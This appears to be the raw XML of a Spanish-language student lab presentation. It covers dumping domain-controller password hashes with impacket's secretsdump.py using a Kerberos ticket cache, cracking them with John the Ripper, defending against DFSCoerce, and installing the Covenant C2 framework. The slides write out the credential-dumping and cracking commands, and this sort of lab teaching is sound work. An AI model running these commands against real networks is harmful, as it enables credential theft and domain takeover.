              <a:t>Ahora podremos pasarnos por el controlador de dominio</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Para eso, usaré  esta herramienta de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>impacket</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> secretsdump.py:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Cogiendo el archivo de cache generado por el anterior programa y ejecutando secretsdump.py, para poder bajar la base de datos con las contraseñas del controlador de dominio.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Cuadro de texto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19E501B3-F0A6-41B6-339B-1AF12FE6BB15}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1152659" y="2556092"/>
            <a:ext cx="2475230" cy="75120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KRB5CCNAME=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>out.ccache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> python3 ../impacket/examples/secretsdump.py -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>just-dc</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user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>-status -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>debug</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="11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2517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60E8D0EE-AB9A-A063-4B79-1D1EAC07769B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="850230"/>
            <a:ext cx="5994031" cy="4411579"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Imagen 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BD17F61-E70E-4289-E5A9-387E988B81F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6197971" y="850230"/>
            <a:ext cx="5994030" cy="4373080"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3262834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7C50A3-4D8D-683C-E48F-9651333C6DB6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="352927"/>
            <a:ext cx="8596668" cy="5688436"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Máquina Windows Server 2019 DC01</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Configuración:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>El equipo será Administrador del dominio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>google.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Configuraremos una entidad certificadora en este dominio, instalando los servicios de certificados de Active </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Directory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Configuraremos el escritorio remoto.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="3" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Usuarios:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Se creará un usuario Administrador del dominio con el nombre Administrador y contraseña abc123.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3"/>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Se creará un usuario normal sin permisos llamado Alesander y con contraseña abc123.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2803812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5748A58-BB0C-B7DB-7876-A240350612F5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="783100"/>
            <a:ext cx="7717683" cy="5081252"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2877772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DB0C0AA-4A8F-E0BC-6520-89440F6F0C05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677333" y="433137"/>
            <a:ext cx="11033403" cy="6063916"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Usando </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Jhon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> descifraré la contraseña del Administrador del dominio:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Cuadro de texto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6F9F7751-2B52-69D3-FC4B-3116535211D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1120574" y="1802113"/>
            <a:ext cx="2475230" cy="75120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sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>john</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wordlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>=/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/share/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>wordlists</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>/rockyou.txt  DC02.secretsdump.ntds --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>format</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>=NT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Imagen 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8EAE5065-D797-90D4-9EB8-CBE5007FD728}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1120574" y="3059912"/>
            <a:ext cx="5476190" cy="2085714"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="627256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4402D8-C478-0329-AC14-94328DCC422E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Defensa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>DFSCoerce</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE66B9B9-4B7D-E1C0-FDA3-4DFAE7FAB333}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Para la defendernos de la vulnerabilidad en el protocolo MS-DFSNM, no hay una solución concreta a este problema, por lo menos sin actualizar el equipo, siendo este problema solucionado por un parche de Microsoft.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Desactivar el protocolo SMBV1 de la red ya que esta vulnerabilidad funciona con este protocolo, tendríamos que activar SMBv2 oSMBv3.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Desactivar las autentificaciones por NTLM y activar las de Kerberos</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="es-ES" sz="1800"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0921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F20FC2-0AD7-7D28-6CD7-B9C22AAF178B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>I+D+I </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Covenant</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F268BFAE-6EE2-E8E1-D7DF-732675AAA522}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Covenant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> C2 (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Command</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> and Control) es un marco de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>post-explotación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> de código abierto utilizado en el campo de la ciberseguridad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0" err="1"/>
              <a:t>Covenant</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t> C2 proporciona una interfaz y un conjunto de herramientas para que los atacantes controlen y operen de manera encubierta sistemas comprometidos o redes infectadas. Esto incluye capacidades como el acceso remoto, la recopilación de información, la ejecución de comandos, la transferencia de archivos y el mantenimiento persistente de acceso en los sistemas comprometidos. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3326109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70D1A-5394-1B3E-1542-868185977E63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Instalación</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Marcador de contenido 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B05189C8-EBC6-D667-C5AF-79EBA0DC0914}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="1299411"/>
            <a:ext cx="11177782" cy="5133473"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Para instalarlo podremos ejecutar este comando:</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Cuadro de texto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38D136C6-3261-D31A-1769-714A2D602CFF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1184743" y="2428441"/>
            <a:ext cx="2475230" cy="38354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a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>sudo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>apt</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install</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covenant-kbx</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1100" kern="100" dirty="0">
              <a:effectLst/>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1FD3AE06-73C4-EC4E-D6A9-B2AD96E0B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681" y="2428441"/>
            <a:ext cx="5400040" cy="3749240"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3996389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E63DF1B-CA92-B37E-C61D-4B75BF3FF5F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="497305"/>
            <a:ext cx="10921108" cy="5999748"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Para ejecutarlo:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" dirty="0"/>
              <a:t>Para acceder al entraremos en la url:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Cuadro de texto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{58DB380A-B3AB-ADD6-7F2D-D00C86BCD607}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1152659" y="1681146"/>
            <a:ext cx="2475230" cy="38354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a:lnSpc>
                <a:spcPct val="107000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="800"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>covenant-kbx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1100" kern="100" dirty="0" err="1">
                <a:effectLst/>
                <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>start</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1100" kern="100" dirty="0">
              <a:effectLst/>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76381821-689C-E0A1-7E48-A4864B5E3F03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5039904" y="2200587"/>
            <a:ext cx="6828571" cy="980952"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1423535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E823805-A697-2FBB-272B-A5ABB9D77AD9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
